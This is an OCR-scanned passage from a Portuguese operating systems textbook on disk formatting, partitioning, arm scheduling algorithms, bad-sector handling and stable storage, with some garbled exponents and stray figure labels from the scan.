mais baixa do que a não formatada. Os setores sobressa- 
lentes não contam para a capacidade formatada; então, 
todos os discos de um determinado tipo têm exatamente 
a mesma capacidade quando enviados, independente- 
mente de quantos setores defeituosos eles de fato têm 
(se o número de setores defeituosos exceder o de so- 
bressalentes, o disco será rejeitado e não enviado). 

Há uma confusão considerável a respeito da capacida- 
de de disco porque alguns fabricantes anunciavam a ca- 
pacidade não formatada para fazer seus discos parecerem 
maiores do que eles eram na realidade. Por exemplo, va- 
mos considerar um disco cuja capacidade não formatada 
é de 200 x 10º bytes. Ele poderia ser vendido como um 
disco de 200 GB. No entanto, após a formatação, pos- 
sivelmente apenas 170 x 10º bytes estavam disponíveis 
para dados. Para aumentar a confusão, o sistema opera- 
cional provavelmente relatará essa capacidade como sen- 
do 158 GB, não 170 GB, pois o software considera uma 
memória de 1 GB como sendo 2* (1.073.741.824) bytes, 
não 10º (1.000.000.000) bytes. Seria melhor se isso fosse 
relatado como 158 GiB. 


lc] Uma ilustração do deslocamento de cilindro. 
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Para piorar ainda mais as coisas, no mundo das 
comunicações de dados, 1 Gbps significa 1 bilhão de 
bits/s porque o prefixo giga realmente significa 10º (um 
quilômetro tem 1.000 metros, não 1.024 metros, afinal 
de contas). Somente para os tamanhos de memória e de 
disco que as medidas quilo, mega, giga e tera significam 
219,22 2% e 2”, respectivamente. 

Para evitar confusão, alguns autores usam os prefi- 
xos quilo, mega, giga e tera para significar 10º, 10°, 10º e 
102, respectivamente, enquanto usando kibi, mebi, gibi 
e tebi para significar 219, 27°, 23 e 2%, respectivamente. 
No entanto, o uso dos prefixos “b” é relativamente raro. 
Apenas caso você goste de números realmente grandes, 
os prefixos após tebi são pebi, exbi, zebi e yobi, então 
um yobibyte representa uma quantidade considerável 
de bytes (2*° para ser preciso). 

A formatação também afeta o desempenho. Se um 
disco de 10.000 RPM tem 300 setores por trilha de 
512 bytes cada, ele leva 6 ms para ler os 153.600 bytes 
em uma trilha para uma taxa de dados de 25.600.000 
bytes/s ou 24,4 MB/s. Não é possível ir mais rapido do 
que isso, não importa o tipo de interface que esteja pre- 
sente, mesmo que seja uma interface SCSI a 80 MB/s 
ou 160 MB/s. 

Na realidade, ler continuamente com essa taxa 
exige um buffer grande no controlador. Considere, 
por exemplo, um controlador com um buffer de um 
setor que tenha recebido um comando para ler dois 


Direção da 
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setores consecutivos. Após ler o primeiro setor do 
disco e realizar o cálculo ECC, os dados precisam ser 
transferidos para a memória principal. Enquanto essa 
transferência está sendo feita, o setor seguinte passará 
pelo cabeçote. Quando uma cópia para a memória for 
concluída, o controlador terá de esperar quase o tempo 
de uma rotação inteira para que o segundo setor dê a 
volta novamente. 

Esse problema pode ser eliminado numerando os se- 
tores de maneira entrelaçada quando se formata o disco. 
Na Figura 5.23(a), vemos o padrão de numeração usual 
(ignorando o deslocamento de cilindro aqui). Na Figura 
5.23(b), observa-se um entrelaçamento simples (sin- 
gle interleaving), que dá ao controlador algum descanso 
entre os setores consecutivos a fim de copiar o buffer 
para a memória principal. 

Se o processo de cópia for muito lento, o entrelaça- 
mento duplo da Figura 5.24(c) poderá ser necessário. 
Se o controlador tem um buffer de apenas um setor, não 
importa se a cópia do buffer para a memória principal 
é feita pelo controlador, a CPU principal ou um chip 
DMA; ela ainda leva algum tempo. Para evitar a neces- 
sidade do entrelaçamento, o controlador deve ser capaz 
de armazenar uma trilha inteira. A maioria dos contro- 
ladores modernos consegue armazenar trilhas inteiras. 

Após a formatação de baixo nível ter sido conclu- 
ida, o disco é dividido em partições. Logicamente, 
cada partição é como um disco separado. Partições são 
necessárias para permitir que múltiplos sistemas ope- 
racionais coexistam. Também, em alguns casos, uma 
partição pode ser usada como área de troca (swapping). 
No x86 e na maioria dos outros computadores, o setor 
0 contém o registro mestre de inicialização (Master 
Boot Record — MBR), que contém um código de ini- 
cialização mais a tabela de partição no fim. O MBR, e 
desse modo o suporte para tabelas de partição, apareceu 
pela primeira vez nos PCs da IBM em 1983 para dar 
suporte ao então enorme disco rígido de 10 MB no PC 
XT. Os discos cresceram um pouco desde então. À me- 
dida que as entradas de partição MBR na maioria dos 
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sistemas são limitadas a 32 bits, o tamanho de disco 
máximo que pode ser suportado pelos setores de 512 B 
é 2 TB. Por essa razão, a maioria dos sistemas operacio- 
nais desde então também suporta o novo GPT (GUID 
Partition Table), que suporta discos de até 9,4 ZB 
(9.444.732.965.739.290.426.880 bytes). No momento 
em que este livro foi para a grafica, isso era considerado 
um montão de bytes. 

A tabela de partição dá o setor de inicialização e o 
tamanho de cada partição. No x86, a tabela de partição 
MBR tem espaço para quatro partições. Se todas forem 
para o Windows, elas serão chamadas C:, D:, E:, e F: 
e tratadas como discos separados. Se três delas forem 
para o Windows e uma para o UNIX, então o Windows 
chamará suas partições C:, D:, e E:. Se o drive USB for 
acrescentado, ele será o F:. Para ser capaz de inicializar 
do disco rígido, uma partição deve ser marcada como ati- 
va na tabela de partição. 

O passo final na preparação de um disco para ser 
usado é realizar uma formatação de alto nível de cada 
partição (separadamente). Essa operação insere um 
bloco de inicialização, a estrutura de gerenciamento 
de armazenamento livre (lista de blocos livres ou mapa 
de bits), diretório-raiz e um sistema de arquivo vazio. 
Ela também coloca um código na entrada da tabela de 
partições dizendo qual sistema de arquivos é usado na 
partição, pois muitos sistemas operacionais suportam 
múltiplos sistemas de arquivos incompatíveis (por 
razões históricas). Nesse ponto, o sistema pode ser 
inicializado. 

Quando a energia é ligada, o BIOS entra em execu- 
ção inicialmente e então carrega o registro mestre de 
inicialização e salta para ele. Esse programa então con- 
fere para ver qual partição está ativa. Então ele carrega 
o setor de inicialização específico daquela partição e o 
executa. O setor de inicialização contém um programa 
pequeno que geralmente carrega um carregador de ini- 
cialização maior que busca no sistema de arquivos para 
encontrar o núcleo do sistema operacional. Esse progra- 
ma é carregado na memória e executado. 


c) Entrelaçamento duplo. 








(a) 


a & 











(c) 


5.4.3 Algoritmos de escalonamento de braço de 
disco 


Nesta seção examinaremos algumas das questões re- 
lacionadas com os drivers de disco em geral. Primeiro, 
considere quanto tempo é necessário para ler ou escre- 
ver um bloco de disco. O tempo exigido é determinado 
por três fatores. 


1. Tempo de busca (o tempo para mover o braço 
para o cilindro correto). 

2. Atraso de rotação (o tempo necessário para o se- 
tor correto aparecer sob o cabeçote). 

3. Tempo de transferência real do dado. 


Para a maioria dos discos, o tempo de busca domina 
os outros dois, então a redução do tempo de busca mé- 
dio pode melhorar substancialmente o desempenho do 
sistema. 

Se o driver do disco aceita as solicitações uma de 
cada vez e as atende nessa ordem, isto é, “primeiro a 
chegar, primeiro a ser servido” (FCFS — First-Co- 
me, First-Served), pouco pode ser feito para otimizar o 
tempo de busca. No entanto, outra estratégia é possível 
quando o disco está totalmente carregado. É provável 
que enquanto o braço está se posicionando para uma so- 
licitação, outras solicitações de disco sejam geradas por 
outros processos. Muitos drivers de disco mantêm uma 
tabela, indexada pelo número do cilindro, com todas as 
solicitações pendentes para cada cilindro encadeadas 
juntas em uma lista ligada encabeçada pelas entradas 
da tabela. 

Dado esse tipo de estrutura de dados, podemos 
melhorar o desempenho do algoritmo de escalona- 
mento FCFS. Para ver como, considere um disco 
imaginário com 40 cilindros. Uma solicitação chega 
para ler um bloco no cilindro 11. Enquanto a busca 
para o cilindro 11 está em andamento, chegam novos 


Capítulo 5 ENTRADA/SAÍDA | 263 


pedidos para os cilindros 1, 36, 16, 34, 9 e 12, nessa 
ordem. Elas são colocadas na tabela de solicitações 
pendentes, com uma lista encadeada separada para 
cada cilindro. As solicitações são mostradas na Fi- 
gura 5.24. 

Quando a solicitação atual (para o cilindro 11) tiver 
sido concluída, o driver do disco tem uma escolha de 
qual solicitação atender em seguida. Usando FCFS, ele 
iria em seguida para o cilindro 1, então para o 36, e as- 
sim por diante. Esse algoritmo exigiria movimentos de 
braço de 10, 35, 20, 18, 25 e 3, respectivamente, para 
um total de 111 cilindros. 

Como alternativa, ele sempre poderia tratar com a 
solicitação mais próxima em seguida, a fim de minimi- 
zar o tempo de busca. Dadas as solicitações da Figura 
5.24, a sequência é 12, 9, 16, 1, 34 e 36, como mostra 
a linha com quebras irregulares na base da Figura 5.24. 
Com essa sequência, os movimentos de braço são 1, 3, 
7, 15,33 e 2, para um total de 61 cilindros. Esse algorit- 
mo, chamado de busca mais curta primeiro (SSF — 
Shortest Seek First), corta o movimento de braço total 
quase pela metade em comparação com o FCFS. 

Infelizmente, o SSF tem um problema. Suponha que 
mais solicitações continuam chegando enquanto as da 
Figura 5.24 estão sendo processadas. Por exemplo, se, 
após ir ao cilindro 16, uma nova solicitação para o cilin- 
dro 8 for apresentada, esta terá prioridade sobre o cilin- 
dro 1. Se chegar então uma solicitação pelo cilindro 13, 
o braço irá em seguida para o 13, em vez do 1. Com um 
disco totalmente carregado, o braço tenderá a ficar no 
meio do disco na maior parte do tempo, de maneira que 
as solicitações em qualquer um dos extremos terão de 
esperar até que uma flutuação estatística na carga faça 
que não existam solicitações próximas do meio. As so- 
licitações longe do meio talvez sejam mal servidas. As 
metas de tempo de resposta mínimo e justiça estão em 
conflito aqui. 


eH TEPI Algoritmo de escalonamento “busca mais curta primeiro” (SSF — Shortest Seek First). 
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Prédios altos também têm de lidar com essa escolha. 
O problema do escalonamento de um elevador em um 
prédio alto é similar ao escalonamento de um braço de 
disco. Solicitações chegam continuamente chamando o 
elevador para os andares (cilindros) ao acaso. O compu- 
tador no comando do elevador poderia facilmente man- 
ter a sequência na qual os clientes pressionaram o botão 
de chamada e servi-los usando FCFS ou SSF. 

No entanto, a maioria dos elevadores usa um algorit- 
mo diferente a fim de reconciliar as metas mutuamente 
conflitantes da eficiência e da justiça. Eles continuam 
se movimentando na mesma direção até que não exis- 
tam mais solicitações pendentes naquela direção, então 
eles trocam de direção. Esse algoritmo, conhecido tanto 
no mundo dos discos quanto no dos elevadores como 
o algoritmo do elevador, exige que o software man- 
tenha 1 bit: o bit de direção atual, SOBE ou DESCE. 
Quando uma solicitação é concluída, o driver do disco 
ou elevador verifica o bit. Se ele for SOBE, o braço ou 
a cabine se move para a próxima solicitação pendente 
mais alta. Se nenhuma solicitação estiver pendente em 
posições mais altas, o bit de direção é invertido. Quando 
o bit contém DESCE, o movimento será para a posição 
solicitada seguinte mais baixa, se houver alguma. Se ne- 
nhuma solicitação estiver pendente, ele simplesmente 
para e espera. 

A Figura 5.25 mostra o algoritmo do elevador usando 
as mesmas solicitações que a Figura 5.24, presumindo 
que o bit de direção fosse inicialmente SOBE. A ordem 
na qual os cilindros são servidos é 12, 16, 34,36,9e1,0 
que resulta nos movimentos de braço de 1, 4, 18, 2,27 e 
8, para um total de 60 cilindros. Nesse caso, o algoritmo 
do elevador é ligeiramente melhor do que o SSF, em- 
bora ele seja em geral pior. Uma boa propriedade que o 
algoritmo do elevador tem é que dada qualquer coleção 
de solicitações, o limite máximo para a distância total 
é fixo: ele é apenas duas vezes o número de cilindros. 


Uma ligeira modificação desse algoritmo que tem uma 
variação menor nos tempos de resposta (TEORY, 1972) 
consiste em sempre varrer as solicitações na mesma dire- 
ção. Quando o cilindro com o número mais alto com uma 
solicitação pendente tiver sido atendido, o braço vai para 
o cilindro com o número mais baixo com uma solução 
pendente e então continua movendo-se para cima. Na rea- 
lidade, o cilindro com o número mais baixo é visto como 
logo acima do cilindro com o número mais alto. 

Alguns controladores de disco fornecem uma manei- 
ra para o software inspecionar o número de setor atual 
sob o cabeçote. Com esse controlador, outra otimização 
é possível. Se duas ou mais solicitações para o mesmo 
cilindro estiverem pendentes, o driver poderá emitir 
uma solicitação para o setor que passará sob o cabeçote 
em seguida. Observe que, quando múltiplas trilhas estão 
presentes em um cilindro, solicitações consecutivas po- 
dem ocorrer para diferentes trilhas sem uma penalidade. 
O controlador pode selecionar qualquer um dos seus ca- 
beçotes quase instantaneamente (a seleção de cabeçotes 
não envolve nem o movimento de braço, tampouco um 
atraso rotacional). 

Se o disco permitir que o tempo de busca seja muito 
mais rápido do que o atraso rotacional, então uma otimi- 
zação diferente deverá ser usada. Solicitações pendentes 
devem ser ordenadas pelo número do setor, e tão logo o 
setor seguinte esteja próximo de passar sob o cabeçote, 
o braço deve ser movido rapidamente para a trilha certa 
para que a leitura ou a escrita seja realizada. 

Com um disco rígido moderno, a busca e os atrasos 
rotacionais dominam de tal maneira o desempenho que 
a leitura de um ou dois setores de cada vez é algo inefi- 
ciente demais. Por essa razão, muitos controladores de 
disco sempre leem e armazenam múltiplos setores, mes- 
mo quando apenas um é solicitado. Tipicamente, qual- 
quer solicitação para ler um setor fará que aquele setor 
e grande parte ou todo o resto da trilha atual seja lida, 
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dependendo de quanto espaço há disponível na memó- 
ria de cache do controlador. O disco rígido descrito na 
Figura 5.18 tem uma cache de 4 MB, por exemplo. O 
uso da cache é determinado dinamicamente pelo con- 
trolador. No seu modo mais simples, a cache é dividida 
em duas seções, uma para leituras e outra para escritas. 
Se uma leitura subsequente puder ser satisfeita da cache 
do controlador, ele poderá retornar os dados solicitados 
imediatamente. 

Vale a pena observar que a cache do controlador de 
disco é completamente independente da cache do siste- 
ma operacional. A cache do controlador em geral con- 
tém blocos que não foram realmente solicitados, mas 
cuja leitura era conveniente porque eles apenas estavam 
passando sob o cabeçote como um efeito colateral de 
alguma outra leitura. Em comparação, qualquer cache 
mantida pelo sistema operacional consistirá de blocos 
que foram explicitamente lidos e que o sistema opera- 
cional acredita que possam ser necessários novamente 
em um futuro próximo (por exemplo, um bloco de disco 
contendo um bloco de diretório). 

Quando vários dispositivos estão presentes no mes- 
mo controlador, o sistema operacional deve manter uma 
tabela de solicitações pendentes para cada dispositivo 
separadamente. Sempre que um dispositivo estiver ocio- 
so, um comando de busca deve ser emitido para mover 
o seu braço para o cilindro onde ele será necessário em 
seguida (presumindo que o controlador permita buscas 
simultâneas). Quando a transferência atual é concluída, 
uma verificação deve ser feita para ver se algum disposi- 
tivo está posicionado no cilindro correto. Se um ou mais 
estiverem, a próxima transferência poderá ser inicializa- 
da em um drive que já esteja no cilindro correto. Se ne- 
nhum dos braços estiver no local correto, o driver deverá 
emitir um novo comando de busca sobre o dispositivo 
que acabou de completar uma transferência e esperar até 
a próxima interrupção para ver qual braço chega ao seu 
destino primeiro. 

É importante perceber que todos os algoritmos de es- 
calonamento de disco acima tacitamente presumem que 
a geometria de disco real é a mesma que a geometria 
virtual. Se não for, o escalonamento das solicitações de 
disco não fará sentido, pois o sistema operacional não 
poderá realmente dizer se o cilindro 40 ou o cilindro 
200 está mais próximo do cilindro 39. Por outro lado, 
se o controlador do disco for capaz de aceitar múltiplas 
solicitações pendentes, ele poderá usar esses algoritmos 
de escalonamento internamente. Nesse caso, os algorit- 
mos ainda serão válidos, mas em um nível abaixo, den- 
tro do controlador. 
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5.4.4 Tratamento de erros 


Os fabricantes de discos estão constantemente ex- 
pandindo os limites da tecnologia por meio do aumen- 
to linear das densidades de bits. Uma trilha central de 
um disco de 13,33 cm tem uma circunferência de apro- 
ximadamente 300 mm. Se a trilha contiver 300 setores 
de 512 bytes, a densidade de gravação linear poderá 
ser de mais ou menos 5.000 bits/mm, levando em con- 
sideração o fato de que algum espaço é perdido para 
os preâmbulos, ECCs e intervalos entre os setores. A 
gravação de 5.000 bits/mm exige um substrato extre- 
mamente uniforme e uma camada muito fina de óxido. 
Infelizmente, não é possível fabricar um disco com es- 
sas especificações sem defeitos. Tão logo a tecnologia 
de fabricação melhore a ponto de ser possível operar 
sem falhas com essas densidades, os projetistas de dis- 
cos projetarão densidades mais altas para aumentar a 
capacidade. Ao fazer isso, os defeitos provavelmente 
serão reintroduzidos. 

Os defeitos de fabricação introduzem setores de- 
feituosos, isto é, setores que não leem corretamente de 
volta o valor recém-escrito neles. Se o defeito for mui- 
to pequeno, digamos, apenas alguns bits, será possível 
usar o setor defeituoso e deixar que o ECC corrija os 
erros todas as vezes. Se o defeito for maior, o erro não 
poderá ser mascarado. 

Existem duas abordagens gerais para blocos defeitu- 
osos: lidar com eles no controlador ou no sistema ope- 
racional. Na primeira abordagem, antes que o disco seja 
enviado da fábrica, ele é testado e uma lista de setores 
defeituosos é escrita no disco. Para cada setor defeituo- 
so, um dos reservas o substitui. 

Há duas maneiras de realizar essa substituição. Na 
Figura 5.26(a), vemos uma única trilha de disco com 
30 setores de dados e dois reservas. O setor 7 é defei- 
tuoso. O que o controlador pode fazer é remapear um 
dos reservas como setor 7, como mostrado na Figura 
5.26(b). A outra saída é deslocar todos os setores de 
uma posição, como mostrado na Figura 5.26(c). Em 
ambos os casos, o controlador precisa saber qual se- 
tor é qual. Ele pode controlar essa informação por 
meio de tabelas internas (uma por trilha) ou reescre- 
vendo os preâmbulos para dar o novo número dos 
setores remapeados. Se os preâmbulos forem reescri- 
tos, o método da Figura 5.26(c) dará mais trabalho 
(pois 23 preâmbulos precisam ser reescritos), mas em 
última análise ele proporcionará um desempenho me- 
lhor, pois uma trilha inteira ainda poderá ser lida em 
uma rotação. 
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lei TEA (a) Uma trilha de disco com um setor defeituoso. (b) Substituindo um setor defeituoso com um reserva. (c) Deslocando 


todos os setores para pular o setor defeituoso. 


reservas Setor 
defeituoso 


Erros também podem ser desenvolvidos durante a 
operação normal após o dispositivo ter sido instalado. 
A primeira linha de defesa para tratar um erro com que 
o ECC não consegue lidar é apenas tentar a leitura no- 
vamente. Alguns erros de leitura são passageiros, isto 
é, são causados por grãos de poeira sob o cabeçote e 
desaparecerão em uma segunda tentativa. Se o contro- 
lador notar que ele está encontrando erros repetidos 
em um determinado setor, pode trocar para um reserva 
antes que o setor morra completamente. Dessa manei- 
ra, nenhum dado é perdido e o sistema operacional e o 
usuário nem notam o problema. Em geral, o método da 
Figura 5.26(b) tem de ser usado, pois os outros setores 
podem conter dados agora. A utilização do método da 
Figura 5.26(c) exigiria não apenas reescrever os preâm- 
bulos, como copiar todos os dados também. 

Anteriormente dissemos que havia duas maneiras 
gerais para lidar com erros: lidar com eles no controla- 
dor ou no sistema operacional. Se o controlador não ti- 
ver a capacidade de remapear setores transparentemente 
como discutimos, o sistema operacional precisará fazer 
a mesma coisa no software. Isso significa que ele preci- 
sará primeiro adquirir uma lista de setores defeituosos, 
seja lendo a partir do disco, ou simplesmente testando 
o próprio disco inteiro. Uma vez que ele saiba quais 
setores são defeituosos, poderá construir as tabelas de 
remapeamento. Se o sistema operacional quiser usar a 
abordagem da Figura 5.26(c), deverá deslocar os dados 
dos setores 7 a 29 um setor para cima. 

Se o sistema operacional estiver lidando com o re- 
mapeamento, ele deve certificar-se de que setores de- 
feituosos não ocorram em nenhum arquivo e também 
não ocorram na lista de blocos livres ou mapa de bits. 
Uma maneira de fazer isso é criar um arquivo secre- 
to consistindo em todos os setores defeituosos. Se esse 
arquivo não tiver sido inserido no sistema de arquivos, 
os usuários não o lerão acidentalmente (ou pior ainda, 
o liberarão). 





No entanto, há ainda outro problema: backups. Se 
for feito um backup do disco, arquivo por arquivo, é 
importante que o utilitário usado para realizar o backup 
não tente copiar o arquivo com o bloco defeituoso. Para 
evitar isso, 0 sistema operacional precisa esconder o 
arquivo com o bloco defeituoso tão bem que mesmo 
esse utilitário para backup não consiga encontrá-lo. Se 
o disco for copiado setor por setor em vez de arquivo 
por arquivo, será difícil, se não impossível, evitar erros 
de leitura durante o backup. A única esperança é que o 
programa de backup seja esperto o suficiente para de- 
sistir depois de 10 leituras fracassadas e continuar com 
o próximo setor. 

Setores defeituosos não são a única fonte de erros. 
Erros de busca causados por problemas mecânicos no 
braço também ocorrem. O controlador controla a posi- 
ção do braço internamente. Para realizar uma busca, ele 
emite um comando para o motor do braço para movê- 
-lo para o novo cilindro. Quando o braço chega ao seu 
destino, o controlador lê o número do cilindro real do 
preâmbulo do setor seguinte. Se o braço estiver no lugar 
errado, ocorreu um erro de busca. 

A maioria dos controladores de disco rígido corrige 
erros de busca automaticamente, mas a maioria dos con- 
troladores de discos flexíveis usada nos anos de 1980 e 
1990 apenas sinalizava um bit de erro e deixava o resto 
para o driver. O driver lidava com esse erro emitindo 
um comando recalibrate, a fim de mover o braço para o 
mais longe possível e reconfigurava a ideia interna do 
cilindro atual do controlador para 0. Normalmente, isso 
solucionava o problema. Se não solucionasse, o dispo- 
sitivo tinha de ser reparado. 

Como vimos há pouco, o controlador é de fato um 
pequeno computador especializado, completo com soft- 
ware, variáveis, buffers e, ocasionalmente, defeitos. 
Às vezes, uma sequência incomum de eventos, como 
uma interrupção em um dispositivo ocorrendo simul- 
taneamente com um comando recalibrate em outro 


dispositivo, desencadeia um erro e faz o controlador 
entrar em um laço infinito ou perder o caminho do que 
está fazendo. Projetistas de controladores costumam 
planejar para a pior situação, e assim fornecem um pino 
no chip que, quando sinalizado, força o controlador a 
esquecer o que estava fazendo e reiniciar-se. Se todo o 
resto falhar, o driver do disco poderá invocar esse sinal 
e reiniciar o controlador. Se isso não funcionar, tudo o 
que o driver pode fazer é imprimir uma mensagem e 
desistir. 

Recalibrar um disco faz um ruído esquisito, mas de 
outra forma, não chega a incomodar. No entanto, há 
uma situação em que a recalibragem é um problema: 
sistemas com restrições de tempo real. Quando um vi- 
deo está sendo exibido (ou servido) de um disco rígido, 
ou arquivos de um disco rígido estão sendo gravados 
em um disco Blu-ray, é fundamental que os bits che- 
guem do disco rígido a uma taxa uniforme. Nessas 
circunstâncias, as recalibragens inserem intervalos no 
fluxo de bits e são inaceitáveis. Dispositivos especiais, 
chamados discos AV (audiovisuais), que nunca recali- 
bram, estão disponíveis para tais aplicações. 

Anedoticamente, uma demonstração muito convin- 
cente de quão avançados os controladores de disco se 
tornaram foi dada pelo hacker holandês Jeroen Dom- 
burg, que invadiu um controlador de disco moderno 
para fazê-lo executar com um código customizado. Na 
realidade o controlador de disco é equipado com um 
processador ARM multinúcleo (!) bastante potente e fa- 
cilmente tem recursos suficientes para executar Linux. 
Se os hackers entrarem em seu disco rígido dessa ma- 
neira, serão capazes de ver e modificar todos os dados 
que você transfere do e para o disco. Mesmo reinstalar 
o sistema operacional desde o princípio não removerá a 
infecção, à medida que o próprio controlador do disco 
é malicioso e serve como uma porta dos fundos perma- 
nente. Em compensação, você pode coletar uma pilha 
de discos rígidos quebrados do seu centro de reciclagem 
local e construir seu próprio computador improvisado 
de graça. 


5.4.5 Armazenamento estável 


Como vimos, discos às vezes geram erros. Bons 
setores podem de repente tornar-se defeituosos. Dispo- 
sitivos inteiros podem pifar inesperadamente. RAIDs 
protegem contra alguns setores de apresentarem defei- 
tos ou mesmo a quebra de um dispositivo. No entan- 
to, não protegem contra erros de gravação que inserem 
dados corrompidos. Eles também não protegem contra 
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quedas do sistema durante a gravação corrompendo os 
dados originais sem substituí-los por dados novos. 

Para algumas aplicações, é essencial que os dados 
nunca sejam perdidos ou corrompidos, mesmo diante 
de erros de disco e CPU. O ideal é que um disco deve 
funcionar simplesmente o tempo inteiro sem erros. In- 
felizmente, isso não é possível. O que é possível é um 
subsistema de disco que tenha a seguinte propriedade: 
quando uma escrita é lançada para ele, o disco ou escre- 
ve corretamente os dados ou não faz nada, deixando os 
dados existentes intactos. Esse sistema é chamado de 
armazenamento estável e é implementado no software 
(LAMPSON e STURGIS, 1979). A meta é manter o 
disco consistente a todo custo. A seguir descreveremos 
uma pequena variante da ideia original. 

Antes de descrever o algoritmo, é importante termos 
um modelo claro dos erros possíveis. O modelo pre- 
sume que, quando um disco escreve um bloco (um ou 
mais setores), ou a escrita está correta ou ela está incor- 
reta e esse erro pode ser detectado em uma leitura sub- 
sequente examinando os valores dos campos ECC. Em 
princípio, a detecção de erros garantida jamais é possi- 
vel, pois com um, digamos, campo de ECC de 16 bytes 
guardando um setor de 512 bytes, há 2º” valores de da- 
dos e apenas 2! valores ECC. Desse modo, se um blo- 
co for distorcido durante a escrita — mas o ECC não —, 
existem bilhões e mais bilhões de combinações incor- 
retas que resultam no mesmo ECC. Se qualquer uma 
delas ocorrer, o erro não será detectado. Como um todo, 
a probabilidade de dados aleatórios terem o ECC de 16 
bytes apropriado é de mais ou menos 2°’, que é uma 
probabilidade tão pequena que a chamaremos de zero, 
embora ela não seja realmente. 

O modelo também presume que um setor escrito cor- 
retamente pode ficar defeituoso espontaneamente e tornar- 
-se ilegível. No entanto, a suposição é que esses eventos 
são tão raros que a probabilidade de ter o mesmo setor 
danificado em um segundo dispositivo (independente) 
durante um intervalo de tempo razoável (por exemplo, 
1 dia) é pequena o suficiente para ser ignorada. 

O modelo também presume que a CPU pode falhar, 
caso em que ela simplesmente para. Qualquer escrita 
no disco em andamento no momento da falha também 
para, levando a dados incorretos em um setor e um ECC 
incorreto que pode ser detectado mais tarde. Com to- 
das essas considerações, o armazenamento estável pode 
se tornar 100% confiável, no sentido de que as escritas 
funcionem corretamente ou deixem os dados antigos no 
lugar. É claro, ele não protege contra desastres físicos, 
como um terremoto acontecendo e o computador des- 
pencando 100 metros em uma fenda e caindo dentro de 
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um lago de lava fervendo. E dificil recuperar de uma 
situação dessas por software. 

O armazenamento estavel usa um par de discos 
idénticos com blocos correspondentes trabalhando jun- 
tos para formar um bloco livre de erros. Na auséncia de 
erros, os blocos correspondentes em ambos os disposi- 
tivos são os mesmos. Qualquer um pode ser lido para 
conseguir o mesmo resultado. Para alcançar essa meta, 
as três operações a seguir são definidas: 


1. Escritas estáveis. Uma escrita estável consiste 
em primeiro escrever um bloco na unidade 1, en- 
tão lê-lo de volta para verificar que ele foi escrito 
corretamente. Se ele foi escrito incorretamente, a 
escrita e a releitura são feitas de novo por n vezes 
até que estejam corretas. Após n falhas consecuti- 
vas, o bloco é remapeado sobre um bloco reserva 
e a operação repetida até que tenha sucesso, não 
importa quantos reservas sejam tentados. Após a 
escrita para a unidade 1 ter sido bem-sucedida, 
o bloco correspondente na unidade 2 é escrito e 
relido, repetidamente se necessário, até que ele, 
também, por fim seja bem-sucedido. Na ausência 
de falhas da CPU, ao cabo de uma escrita estável, 
o bloco terá sido escrito e conferido em ambas as 
unidades. 

2. Leituras estáveis. Uma leitura estável primeiro 
lê o bloco da unidade 1. Se isso produzir um 
ECC incorreto, a leitura é tentada novamente, 
até n vezes. Se todas elas derem ECCs defeituo- 
sos, 0 bloco correspondente é lido da unidade 2. 
Levando-se em consideração o fato de que uma 
escrita estável bem-sucedida deixa duas boas 
cópias de um bloco para trás, e nossa suposição 
de que a probabilidade de o mesmo bloco es- 
pontaneamente apresentar um defeito em ambas 
as unidades em um intervalo de tempo razoá- 
vel é desprezível, uma leitura estável sempre é 
bem-sucedida. 


3. Recuperação de falhas. Após uma queda do sis- 
tema, um programa de recuperação varre ambos 
os discos comparando blocos correspondentes. 
Se um par de blocos está bem e ambos são iguais, 
nada é feito. Se um deles tiver um erro de ECC, o 
bloco defeituoso é sobrescrito com o bloco bom 
correspondente. Se um par de blocos está bem 
mas eles são diferentes, o bloco da unidade 1 é 
escrito sobre o da unidade 2. 


Na ausência de falhas de CPU, esse esquema sem- 
pre funciona, pois escritas estáveis sempre escrevem 
duas cópias válidas de cada bloco e erros espontâneos 
são presumidos que jamais ocorram em ambos os blo- 
cos correspondentes ao mesmo tempo. E na presença 
de falhas na CPU durante escritas estáveis? Depende 
precisamente de quando ocorre a falha. Há cinco possi- 
bilidades, como descrito na Figura 5.27. 

Na Figura 5.27(a), a falha da CPU ocorre antes que 
qualquer uma das cópias do bloco seja escrita. Durante 
a recuperação, nenhuma será modificada e o valor anti- 
go continuará a existir, o que é permitido. 

Na Figura 5.27(b), a CPU falha durante a escrita na 
unidade 1, destruindo o conteúdo do bloco. No entanto, o 
programa de recuperação detecta o erro e restaura o bloco 
na unidade 1 da unidade 2. Desse modo, o efeito da falha 
é apagado e o estado antigo é completamente restaurado. 

Na Figura 5.27(c), a falha da CPU acontece após a 
unidade 1 ter sido escrita, mas antes de a unidade 2 ter 
sido escrita. O ponto em que não há mais volta foi pas- 
sado aqui: o programa de recuperação copia o bloco da 
unidade 1 para a unidade 2. A escrita é bem-sucedida. 

A Figura 5.27(d) é como a Figura 5.27(b): durante a 
recuperação, o bloco bom escreve sobre o defeituoso. 
Novamente, o valor final de ambos os blocos é o novo. 

Por fim, na Figura 5.27(e), o programa de recupe- 
ração vê que ambos os blocos são os mesmos, portanto 
nenhum deles é modificado e a escrita é bem-sucedida 
aqui também. 
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Várias otimizações e melhorias são possíveis para 
esse esquema. Para começo de conversa, comparar to- 
dos os blocos em pares após uma falha é possível, mas 
caro. Um avanço enorme é controlar qual bloco esta- 
va sendo escrito durante a escrita estável, de maneira 
que apenas um bloco precisa ser conferido durante a 
recuperação. Alguns computadores têm uma pequena 
quantidade de RAM não volátil, que é uma memória 
CMOS especial mantida por uma bateria de lítio. Es- 
sas baterias duram por anos, possivelmente durante a 
vida inteira do computador. Diferentemente da memó- 
ria principal, que é perdida após uma queda, a RAM 
não volátil não é perdida após uma queda. A hora do 
dia é em geral mantida ali (e incrementada por um cir- 
cuito especial), razão pela qual os computadores ain- 
da sabem que horas são mesmo depois de terem sido 
desligados. 

Suponha que alguns bytes de RAM não volátil es- 
tejam disponíveis para uso do sistema operacional. A 
escrita estável pode colocar o número do bloco que 
ela está prestes a atualizar na RAM não volátil antes 
de começar a escrever. Após completar de maneira 
bem-sucedida a escrita estável, o número do bloco na 
RAM nao volátil é sobrescrito com um número de blo- 
co inválido, por exemplo, — 1. Nessas condições, após 
uma falha, o programa de recuperação pode conferir a 
RAM não volátil para ver se havia uma escrita estável 
em andamento durante a falha e, se afirmativo, qual 
bloco estava sendo escrito quando a falha aconteceu. 
As duas cópias podem então ser conferidas quanto à 
exatidão e consistência. 

Se a RAM não volátil não estiver disponível, ela 
pode ser simulada como a seguir. No começo de uma 
escrita estável, um bloco de disco fixo na unidade 1 é 
sobrescrito com o número do bloco a ser escrito esta- 
velmente. Esse bloco é então lido de novo para verificá- 
